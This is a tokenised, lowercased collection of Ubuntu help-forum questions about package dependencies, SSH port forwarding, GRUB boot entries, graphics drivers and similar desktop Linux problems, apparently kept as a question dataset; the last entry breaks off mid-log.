492121	unable to install updates . unmet dependencies icedtea-7-jre-jamvm and openjdk-7-jre	i am a newbie please help . unable to install updates . details shows : the following packages have unmet dependencies : icedtea-7-jre-jamvm : depends : openjdk-7-jre-headless ( = 7u55-2.4.7-1ubuntu1~0.12.04.2 ) but 7u51-2.4.4-0ubuntu0.12.04.2 is installed depends : zlib1g ( > = 1:1.1.4 ) but 1:1.2.3.4.dfsg-3ubuntu4 is installed openjdk-7-jre : depends : openjdk-7-jre-headless ( = 7u55-2.4.7-1ubuntu1~0.12.04.2 ) but 7u51-2.4.4-0ubuntu0.12.04.2 is installed depends : libjpeg8 ( > = 8c ) but 8c-2ubuntu7 is installed depends : libpulse0 ( > = 1:0.99.1 ) but 1:1.1-0ubuntu15.4 is installed depends : libgl1 but it is a virtual package
492122	can not ssh from outside lan despite port forwarding seems fine	running ubuntu 12.04 , i 've set up the openssh server . i can connect from within lan , but not from outside . i am using the same sshd_config file as on my other ubuntu 12.04 machines ( that sit in a different lan ) . $ ssh 192.168.0.2 works fine , but $ ssh 65.76.97.222 ( made up ip address ) does not work . nothing happens . no error message , or anything . the prompt just sits there . thanks to comments below , i have managed to verify via websites canyouseeme.org and shieldsup that port 22 is indeed open . using the option -vvv , i get the following : $ ssh -vvv 65.76.97.222 openssh_5.9p1 debian-5ubuntu1.4 , openssl 1.0.1 14 mar 2012 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug2 : ssh_connect : needpriv 0 debug1 : connecting to 65.76.97.222 [ 65.76.97.222 ] port 22. debug1 : connection established . debug1 : identity file /home/myname/.ssh/id_rsa type -1 debug1 : identity file /home/myname/.ssh/id_rsa-cert type -1 debug1 : identity file /home/myname/.ssh/id_dsa type -1 debug1 : identity file /home/myname/.ssh/id_dsa-cert type -1 debug1 : identity file /home/myname/.ssh/id_ecdsa type -1 debug1 : identity file /home/myname/.ssh/id_ecdsa-cert type -1 and then the prompt just sits there . further debug information from var/log/auth.log : $ grep sshd /var/log/auth.log [ cutting old lines ... ] jul 6 10:23:05 mymachine sshd [ 7871 ] : did not receive identification string from 65.76.97.222 i am allowing any user to connect , in particular my own username . what confuses me is that i have not had this problem on any other machine , although they are on a different lan . this lan has only one computer attached to it . any ideas of how to proceed from here ?
492123	acer travelmate 8204 not booting	i installed ubuntu on my acer travelmate 8204 ( with the ati radeon mobility x1600 graphics card ) after testing that the live version works . however , after installation ( keeping the old winxp ) the laptop does not boot ubuntu - i just get a blinking cursor after choosing ubuntu . any suggestions as how to fix this issue ? is the problem with the graphics card ? this laptop seems to have serious probs with linux distros , because i 've tried many and none of them boot .
492125	recent chats and bookmarked chats sub-menu is not visible on skype appindicator	each time i move my mouse point to recent chats and bookmarked chats on skype appindicator , it did not appear any sub-menu . i just see a dim patch in there . i 'm using ubuntu 14.04 and skype 4.3 i tried to remove and re-install skype but it did n't work could some one give me an advice ?
492127	how to run haskell platform after build	i built the haskell platform as stated on the haskell package site . after make install i was told the files were installed to /usr/local/bin how do i run the haskell platform after this step ?
492129	can not install applications - packet manager will not launch	when i try and launch the synaptic packet manager i get the following error and then the application closes . e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/repository.spotify.com_dists_stable_non-free_i18n_translation-en % 5fgb e : the package lists or status file could not be parsed or opened . e : _cache- > open ( ) failed , please report . where do i start ? many thanks , alec
492131	why cant the terminal locate and install acetoneiso_2.3.tar.gz . ?	the package is on my desktop cd desktop parallels @ louiseavon : ~/desktop $ sudo apt-get install acetoneiso_2.3.tar.gz [ sudo ] password for parallels : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package acetoneiso_2.3.tar.gz e : could n't find any package by regex 'acetoneiso_2.3.tar.gz' parallels @ louiseavon : ~/desktop $ what can i do ? is the file extension the problem ?
492133	ca n't launch unity bar with wacom tablet	i have a wacom intuos cth680 & i ca n't seem to be able to launch the unity bar with the pen . when i move the pen to the edge of the detection area , the unity bar does n't reveal itself . the only way i can use the unity launcher with the pen is if i disable autohide , but then the unity launcher obstructs stuff on the left side of my screen . how do i get the pen to be able to reveal the unity launcher ? i am on ubuntu 14.04âall of the wacom help out there seems to be for much older versions of ubuntu .
492135	ubuntu 14.04 kernel update 3.13.0-30.55 made my laptop cpu gets overheated	i just received an update to the linux kernel of ubuntu 14.04 from 3.13.0-30.54 to 3.13.0-30.55 . after i upgrade it the cpu on my laptop is around 70 to 80 degree celsius . while on the previous kernel is about 55-65 degree celsius , and never reach about 75 degree , except on some situation like running a virtual machine . i do n't know what caused this but i have to downgrade it to the previous 3.13.0-30.54 to prevent overheating on continual use . hope there is a new kernel update that fixes this . screenshot of the synaptic to show the version of the kernel will be posted later .
492140	i am new to ubuntu and have some questions way beyond a first timer	back story is i was given a desktop with ubuntu 12.04 installed and the guy could not remember any of his setup ( u/n pass ) info . he told me to just install what os i wanted over his . when i did this i did n't realize there were 2 hdds in it . when i did the install it wrote over the hdd that did n't have his os . i would like to delete his old os since it is locked and unusable . my second problem is that if i dont go to boot priority ( f12 ) and select hdd even though it is first in priority . then it goes to grub and i pick lubuntu . if someone could help i would really appreciate it as i have already found lots of help here lurking . thank you in advance .
492142	why do i have duplicate `` ubuntu '' entries in my boot loader menu ?	when i enter my boot menu , i see two entries labeled `` [ ubuntu ] '' that load exactly the same operating system . the recovery entry is also missing . i ran boot info script , which typically covers everything i 'd ever want to know about my boot configuration , although i 'm rather inexperienced in this area , so i do n't know where to look : boot info script 0.61 [ 1 april 2012 ] ============================= boot info summary : =============================== = > no boot loader is installed in the mbr of /dev/sda . = > no boot loader is installed in the mbr of /dev/sdb . sda1 : __________________________________________________________________________ file system : vfat boot sector type : fat32 boot sector info : no errors found in the boot parameter block . operating system : boot files : /efi/ubuntu/grubx64.efi /efi/ubuntu/mokmanager.efi /efi/ubuntu/shimx64.efi sda2 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info : sda3 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 14.04 lts boot files : /boot/grub/grub.cfg /etc/fstab sda4 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : boot files : sdb1 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : boot files : ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 256.1 gb , 256060514304 bytes 255 heads , 63 sectors/track , 31130 cylinders , total 500118192 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 1 500,118,191 500,118,191 ee gpt guid partition table detected . partition start sector end sector # of sectors system /dev/sda1 2,048 585,727 583,680 efi system partition /dev/sda2 585,728 20,586,495 20,000,768 swap partition ( linux ) /dev/sda3 20,586,496 100,587,519 80,001,024 data partition ( linux ) /dev/sda4 100,587,520 500,117,503 399,529,984 data partition ( linux ) drive : sdb _____________________________________________________________________ disk /dev/sdb : 256.1 gb , 256060514304 bytes 255 heads , 63 sectors/track , 31130 cylinders , total 500118192 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdb1 1 500,118,191 500,118,191 ee gpt guid partition table detected . partition start sector end sector # of sectors system /dev/sdb1 2,048 500,117,503 500,115,456 data partition ( linux ) '' blkid '' output : ________________________________________________________________ device uuid type label /dev/sda1 2af3-9776 vfat /dev/sda2 c0ae5bdd-43b0-40a6-9d0c-c1b295229549 swap /dev/sda3 8c7c9d55-8d93-4f6d-a546-83b2eca5e9c2 ext4 /dev/sda4 40ce1056-aec6-408b-97ba-c7ac396a265e ext4 /dev/sdb1 8d58b32f-4801-42a3-95ac-5b1d02a6a8b9 ext4 ================================ mount points : ================================= device mount_point type options /dev/sda1 /boot/efi vfat ( rw ) /dev/sda3 / ext4 ( rw , errors=remount-ro ) /dev/sda4 /home ext4 ( rw ) /dev/sdb1 /data ext4 ( rw ) =========================== sda3/boot/grub/grub.cfg : =========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi if [ `` $ { next_entry } '' ] ; then set default= '' $ { next_entry } '' set next_entry= save_env next_entry set boot_once=true else set default= '' 0 '' fi if [ x '' $ { feature_menuentry_id } '' = xy ] ; then menuentry_id_option= '' -- id '' else menuentry_id_option= '' '' fi export menuentry_id_option if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { if [ x $ feature_all_video_module = xy ] ; then insmod all_video else insmod efi_gop insmod efi_uga insmod ieee1275_fb insmod vbe insmod vga insmod video_bochs insmod video_cirrus fi } if [ x $ feature_default_font_path = xy ] ; then font=unicode else insmod part_gpt insmod ext2 set root='hd0 , gpt3' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt3 -- hint-efi=hd0 , gpt3 -- hint-baremetal=ahci0 , gpt3 8c7c9d55-8d93-4f6d-a546-83b2eca5e9c2 else search -- no-floppy -- fs-uuid -- set=root 8c7c9d55-8d93-4f6d-a546-83b2eca5e9c2 fi font= '' /usr/share/grub/unicode.pf2 '' fi if loadfont $ font ; then set gfxmode=auto load_video insmod gfxterm set locale_dir= $ prefix/locale set lang=en_us insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else if [ x $ feature_timeout_style = xy ] ; then set timeout_style=hidden set timeout=0 # fallback hidden-timeout code in case the timeout_style feature is # unavailable . elif sleep -- interruptible 0 ; then set timeout=0 fi fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode menuentry 'ubuntu ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-8c7c9d55-8d93-4f6d-a546-83b2eca5e9c2 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt3' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt3 -- hint-efi=hd0 , gpt3 -- hint-baremetal=ahci0 , gpt3 8c7c9d55-8d93-4f6d-a546-83b2eca5e9c2 else search -- no-floppy -- fs-uuid -- set=root 8c7c9d55-8d93-4f6d-a546-83b2eca5e9c2 fi linux /boot/vmlinuz-3.13.0-30-generic.efi.signed root=uuid=8c7c9d55-8d93-4f6d-a546-83b2eca5e9c2 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.13.0-30-generic } submenu 'advanced options for ubuntu ' $ menuentry_id_option 'gnulinux-advanced-8c7c9d55-8d93-4f6d-a546-83b2eca5e9c2 ' { menuentry 'ubuntu , with linux 3.13.0-30-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-30-generic-advanced-8c7c9d55-8d93-4f6d-a546-83b2eca5e9c2 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt3' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt3 -- hint-efi=hd0 , gpt3 -- hint-baremetal=ahci0 , gpt3 8c7c9d55-8d93-4f6d-a546-83b2eca5e9c2 else search -- no-floppy -- fs-uuid -- set=root 8c7c9d55-8d93-4f6d-a546-83b2eca5e9c2 fi echo 'loading linux 3.13.0-30-generic ... ' linux /boot/vmlinuz-3.13.0-30-generic.efi.signed root=uuid=8c7c9d55-8d93-4f6d-a546-83b2eca5e9c2 ro quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-30-generic } menuentry 'ubuntu , with linux 3.13.0-30-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-30-generic-recovery-8c7c9d55-8d93-4f6d-a546-83b2eca5e9c2 ' { recordfail load_video insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt3' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt3 -- hint-efi=hd0 , gpt3 -- hint-baremetal=ahci0 , gpt3 8c7c9d55-8d93-4f6d-a546-83b2eca5e9c2 else search -- no-floppy -- fs-uuid -- set=root 8c7c9d55-8d93-4f6d-a546-83b2eca5e9c2 fi echo 'loading linux 3.13.0-30-generic ... ' linux /boot/vmlinuz-3.13.0-30-generic.efi.signed root=uuid=8c7c9d55-8d93-4f6d-a546-83b2eca5e9c2 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-30-generic } menuentry 'ubuntu , with linux 3.13.0-24-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-24-generic-advanced-8c7c9d55-8d93-4f6d-a546-83b2eca5e9c2 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt3' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt3 -- hint-efi=hd0 , gpt3 -- hint-baremetal=ahci0 , gpt3 8c7c9d55-8d93-4f6d-a546-83b2eca5e9c2 else search -- no-floppy -- fs-uuid -- set=root 8c7c9d55-8d93-4f6d-a546-83b2eca5e9c2 fi echo 'loading linux 3.13.0-24-generic ... ' linux /boot/vmlinuz-3.13.0-24-generic root=uuid=8c7c9d55-8d93-4f6d-a546-83b2eca5e9c2 ro quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-24-generic } menuentry 'ubuntu , with linux 3.13.0-24-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-24-generic-recovery-8c7c9d55-8d93-4f6d-a546-83b2eca5e9c2 ' { recordfail load_video insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt3' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt3 -- hint-efi=hd0 , gpt3 -- hint-baremetal=ahci0 , gpt3 8c7c9d55-8d93-4f6d-a546-83b2eca5e9c2 else search -- no-floppy -- fs-uuid -- set=root 8c7c9d55-8d93-4f6d-a546-83b2eca5e9c2 fi echo 'loading linux 3.13.0-24-generic ... ' linux /boot/vmlinuz-3.13.0-24-generic root=uuid=8c7c9d55-8d93-4f6d-a546-83b2eca5e9c2 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-24-generic } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/30_uefi-firmware # # # menuentry 'system setup ' $ menuentry_id_option 'uefi-firmware ' { fwsetup } # # # end /etc/grub.d/30_uefi-firmware # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ { config_directory } /custom.cfg ] ; then source $ { config_directory } /custom.cfg elif [ -z `` $ { config_directory } '' -a -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =============================== sda3/etc/fstab : ================================ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda3 during installation uuid=8c7c9d55-8d93-4f6d-a546-83b2eca5e9c2 / ext4 errors=remount-ro 0 1 # /boot/efi was on /dev/sda1 during installation uuid=2af3-9776 /boot/efi vfat defaults 0 1 # /data was on /dev/sdb1 during installation uuid=8d58b32f-4801-42a3-95ac-5b1d02a6a8b9 /data ext4 defaults 0 2 # /home was on /dev/sda4 during installation uuid=40ce1056-aec6-408b-97ba-c7ac396a265e /home ext4 defaults 0 2 # swap was on /dev/sda2 during installation uuid=c0ae5bdd-43b0-40a6-9d0c-c1b295229549 none swap sw 0 0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =================== sda3 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) =============================== stderr messages : =============================== cat : /tmp/bootinfo-bxc0ufst/tmp_log : no such file or directory for reference , this is a continuation of this question , which has been resolved except for this issue .
492152	when i push the sleep button on my keyboard , it prompts for a password	how can i disable the password when i push the sleep button ? i just want it to sleep .
492154	no longer access to ubuntu	i wanted to change permission for a folder which located in documents using this command chmod -r 777 /folder/path/ . it started to list a lot of folders following them with access denied message . then whatever application i tried to launch , i got an access denied message . i had to force restart the computer , but now i ca n't log into ubuntu . and i get a message concern graphic card and i ca n't bypass it .
492157	can i run bash commands from an ubuntu html5 app ?	i want to convert some bash scripts into gui apps using the ubuntu sdk to create an html5 app . is this possible ? are there any tutorials besides the 'meanings ' one that demonstrate this ?
492160	i just installed ubuntu and i 've been having weird crashes	so i 'll start from the beginning . when i first had installed ubuntu i was sitting there on the desktop doing nothing . a update popped up and i decided to install it so i can have my ubuntu up to date . whilst the update was installing and all that i went on to firefox and started installing skype . a bit after i click the install button for skype i get this weird crash it 's very hard to explain so visit the picture link : http : //prntscr.com/3zsqe8 i did a hard restart by holding down my power button and rebooted ubuntu . when i rebooted it the resolution had changed from 1920x1080 to something else i 'm not quite sure . i talked with my friend on how to fix this and he said that i should download the nvidia driver since i have a gtx 660 video card . so i looked up a guide on how to install the driver on ubuntu and i managed to install it on the machine . the guide told me to type a command to check if the driver was working so i did and it turned out that it was in fact not working properly . it said on the nvidia homepage that i needed the driver 331.89 and i had 331.79 , i 'm not quite sure but i believe that 's how it was . so i looked over the list of additional drivers and i could n't find 331.89 . i tried restarting my computer and when it came to the login screen . i started typing in my password but it didnt register . my login screen froze completely . i have led 's on my keyboard and they 're supposed to light up when the keyboard is on . my mouse has an led too and it was on but i could n't move my mouse . i restarted my pc again and then theres a black screen when booting up ubuntu . i did it once more and another black screen appeared . i then decided i 'd continue tomorrrow and booted up windows 7 . i had to restart my pc for some reasons on windows 7 and forgot to boot up in windows 7 again so it booted up in ubuntu . i could see my login screen now instead of a black screen and attempted to write in my password but it froze.. again.. and i restarted it again and booted up in windows 7 . this is a rather long question but question # 1 is how do i fix this login freeze thing . question # 2 is how do i fix the resolution . as mentioned before i have a geforce gtx 660 video card . thank you for your time : ) edit : the login screen does not freeze it just looked like it . the clock is going . but the type thing that line that blinks before you type something was not blinking which is why i assumed it had frozen . i think my mouse and keyboard are disabled or something . they work on windows but apparently not on ubuntu . question 1 remains unsolved . cant do question 2 if question 1 is n't out of the way.. : / again , thank you for your time
492162	dual boot win7 ubuntu : win7 goneďź	recently i installed ubuntu 64 after win7 64 . i used 'try ubuntu ' to set the disk partition with ext4 and swap . but after i installed the ubuntu , my windows system is gone . even i used boot-repair , i could not find the partition that i installed win7 . can anyone help ? i want to find my data under win7 . because it seems that the win7 with the uefi partition have been erased !
492169	iptables-persistent not uninstalling	i 'm running ubuntu 14.04 and i simply want to uninstall iptables-persistent to test something . as suggested here ( http : //www.installion.co.uk/ubuntu/saucy/universe/i/iptables-persistent/uninstall.html ) i tried : sudo apt-get remove -- auto-remove iptables-persistent ... but it 's still there . i tried again and got the message : package 'iptables-persistent ' is not installed , so not removed but it is n't removed . i rebooted and still am able to run /etc/init.d/iptables-persistent save and /etc/init.d/iptables-persistent is still there . what am i missing ? should n't that file be gone after removing it as i did ?
492172	kubuntu 14.04lts , radeon rs690 ( x1270 ) , unable to use resolution of more than 1024x768	i have recently upgrade from 10.04lts to 14.04lts . somewhere along the way , my ability to use 1366x748 resolution stopped . any suggetions would be apprecieated . i have tried various solutions including getting rid of various drivers , creating a xorg.conf ; all to no avail . i think my system is now fairly vanilla ( having gotten rid of the various changes i have tried ) . in comparing the old 10.04lts xorg.0.log files , the striking difference is that the old one had a large number of radeon lines . to me at least it looks like the radeon module is not being connected to , and this is confirmed by a view of lsmod . anyway , here is the information which i think might be helpful in solving the problem . ~ > inxi -g graphics : card : advanced micro devices [ amd/ati ] rs690m [ radeon xpress 1200/1250/1270 ] x.org : 1.15.1 drivers : fbdev , ati , radeon ( unloaded : vesa ) resolution : 1024x768 @ 76.0hz glx renderer : gallium 0.4 on llvmpipe ( llvm 3.4 , 128 bits ) glx version : 2.1 mesa 10.1.3 no /etc/x11/xorg.conf . it looks to me like the radeon module is loaded by the kernel , but nothing is connected to it . i can remove it with rmmod , together with ttm , drm , and drm_kms_helper . ~ > lsmod | grep radeon radeon 1514165 0 ttm 85115 1 radeon drm_kms_helper 53081 1 radeon drm 303102 3 ttm , drm_kms_helper , radeon i2c_algo_bit 13413 1 radeon syslog seems to suggest it was installed properly at boot time . ~ > dmesg | grep drm [ 2.094250 ] [ drm ] initialized drm 1.1.0 20060810 [ 2.161791 ] [ drm ] radeon userspace modesetting enabled . [ 2.164082 ] [ drm ] supports vblank timestamp caching rev 2 ( 21.10.2013 ) . [ 2.164085 ] [ drm ] no driver support for vblank timestamp query . [ 2.164091 ] [ drm ] initialized radeon 1.34.0 20080528 for 0000:01:05.0 on minor 0 getting the edid information and trying xrandr produces the following : > get-esid > xx > parse-edid < xx checksum correct section `` monitor '' identifier `` � @ '' modelname `` � @ '' vendorname `` sec '' # monitor manufactured week 0 of 2009 # edid version 1.3 # digital display displaysize 270 160 gamma 2.20 option `` dpms '' `` false '' modeline `` mode 0 '' 70.83 1366 1414 1446 1494 768 770 775 790 -hsync -vsync endsection > xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 1024 x 768 , current 1024 x 768 , maximum 1024 x 768 default connected 1024x768+0+0 0mm x 0mm 1024x768 76.0* 1366x768 ( 0x1d8 ) 70.8mhz h : width 1366 start 1414 end 1446 total 1494 skew 0 clock 47.4khz v : height 768 start 770 end 775 total 790 clock 60.0hz > xrandr -- addmode default 1366x768 xrandr : failed to get size of gamma for output default > xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 1024 x 768 , current 1024 x 768 , maximum 1366 x 768 default connected 1024x768+0+0 0mm x 0mm 1024x768 76.0* 1366x768 60.0 > xrandr -- output default -- mode 1366x768 xrandr : failed to get size of gamma for output default xrandr : configure crtc 0 failed some much for trying to do things somewhat manually . and here is the xorg.0.log . perhaps of some interest is the `` [ kms ] drm report modesetting is n't supported . '' error . also , there are no messages as used to appear in 10.04lts which being with the word radeon . [ 40.238 ] x.org x server 1.15.1 release date : 2014-04-13 [ 40.238 ] x protocol version 11 , revision 0 [ 40.238 ] build operating system : linux 3.2.0-37-generic x86_64 ubuntu [ 40.239 ] current operating system : linux jenuth-netbook 3.13.0-30-generic # 55-ubuntu smp fri jul 4 21:40:53 utc 2014 x86_64 [ 40.239 ] kernel command line : boot_image=/boot/vmlinuz-3.13.0-30-generic root=uuid=37ad60c7-707e-4770-91b3-b992084c8fdd ro quiet splash nomodeset video=uvesafb : mode_option=1024x768-24 , mtrr=3 , scroll=ywrap vt.handoff=7 [ 40.239 ] build date : 16 april 2014 01:36:29pm [ 40.239 ] xorg-server 2:1.15.1-0ubuntu2 ( for technical support please see http : //www.ubuntu.com/support ) [ 40.239 ] current version of pixman : 0.30.2 [ 40.239 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 40.239 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 40.239 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : sat jul 5 17:56:50 2014 [ 40.256 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 40.264 ] ( == ) no layout section . using the first screen section . [ 40.264 ] ( == ) no screen section available . using defaults . [ 40.264 ] ( ** ) | -- > screen `` default screen section '' ( 0 ) [ 40.264 ] ( ** ) | | -- > monitor `` < default monitor > '' [ 40.265 ] ( == ) no monitor specified for screen `` default screen section '' . using a default monitor configuration . [ 40.265 ] ( == ) automatically adding devices [ 40.265 ] ( == ) automatically enabling devices [ 40.265 ] ( == ) automatically adding gpu devices [ 40.265 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 40.265 ] entry deleted from font path . [ 40.265 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/100dpi/ : unscaled , /usr/share/fonts/x11/75dpi/ : unscaled , /usr/share/fonts/x11/type1 , /usr/share/fonts/x11/100dpi , /usr/share/fonts/x11/75dpi , built-ins [ 40.265 ] ( == ) modulepath set to `` /usr/lib/x86_64-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 40.265 ] ( ii ) the server relies on udev to provide the list of input devices . if no devices become available , reconfigure udev or disable autoadddevices . [ 40.265 ] ( ii ) loader magic : 0x7f998e60ed60 [ 40.265 ] ( ii ) module abi versions : [ 40.265 ] x.org ansi c emulation : 0.4 [ 40.265 ] x.org video driver : 15.0 [ 40.265 ] x.org xinput driver : 20.0 [ 40.265 ] x.org server extension : 8.0 [ 40.266 ] ( ii ) xfree86 : adding drm device ( /dev/dri/card0 ) [ 40.292 ] ( -- ) pci : * ( 0:1:5:0 ) 1002:791f:1025:028c rev 0 , mem @ 0xd0000000/268435456 , 0xf0100000/65536 , 0xf0000000/1048576 , i/o @ 0x00009000/256 [ 40.292 ] initializing built-in extension generic event extension [ 40.292 ] initializing built-in extension shape [ 40.292 ] initializing built-in extension mit-shm [ 40.292 ] initializing built-in extension xinputextension [ 40.292 ] initializing built-in extension xtest [ 40.293 ] initializing built-in extension big-requests [ 40.293 ] initializing built-in extension sync [ 40.293 ] initializing built-in extension xkeyboard [ 40.293 ] initializing built-in extension xc-misc [ 40.293 ] initializing built-in extension security [ 40.293 ] initializing built-in extension xinerama [ 40.293 ] initializing built-in extension xfixes [ 40.293 ] initializing built-in extension render [ 40.293 ] initializing built-in extension randr [ 40.293 ] initializing built-in extension composite [ 40.293 ] initializing built-in extension damage [ 40.293 ] initializing built-in extension mit-screen-saver [ 40.293 ] initializing built-in extension double-buffer [ 40.293 ] initializing built-in extension record [ 40.293 ] initializing built-in extension dpms [ 40.293 ] initializing built-in extension present [ 40.293 ] initializing built-in extension dri3 [ 40.293 ] initializing built-in extension x-resource [ 40.293 ] initializing built-in extension xvideo [ 40.293 ] initializing built-in extension xvideo-motioncompensation [ 40.293 ] initializing built-in extension selinux [ 40.293 ] initializing built-in extension xfree86-vidmodeextension [ 40.293 ] initializing built-in extension xfree86-dga [ 40.293 ] initializing built-in extension xfree86-dri [ 40.293 ] initializing built-in extension dri2 [ 40.293 ] ( ii ) loadmodule : `` glx '' [ 40.294 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libglx.so [ 40.359 ] ( ii ) module glx : vendor= '' x.org foundation '' [ 40.359 ] compiled for 1.15.1 , module version = 1.0.0 [ 40.359 ] abi class : x.org server extension , version 8.0 [ 40.359 ] ( == ) aiglx enabled [ 40.359 ] loading extension glx [ 40.359 ] ( == ) matched fglrx as autoconfigured driver 0 [ 40.359 ] ( == ) matched ati as autoconfigured driver 1 [ 40.359 ] ( == ) matched fglrx as autoconfigured driver 2 [ 40.359 ] ( == ) matched ati as autoconfigured driver 3 [ 40.359 ] ( == ) matched modesetting as autoconfigured driver 4 [ 40.359 ] ( == ) matched fbdev as autoconfigured driver 5 [ 40.359 ] ( == ) matched vesa as autoconfigured driver 6 [ 40.359 ] ( == ) assigned the driver to the xf86configlayout [ 40.359 ] ( ii ) loadmodule : `` fglrx '' 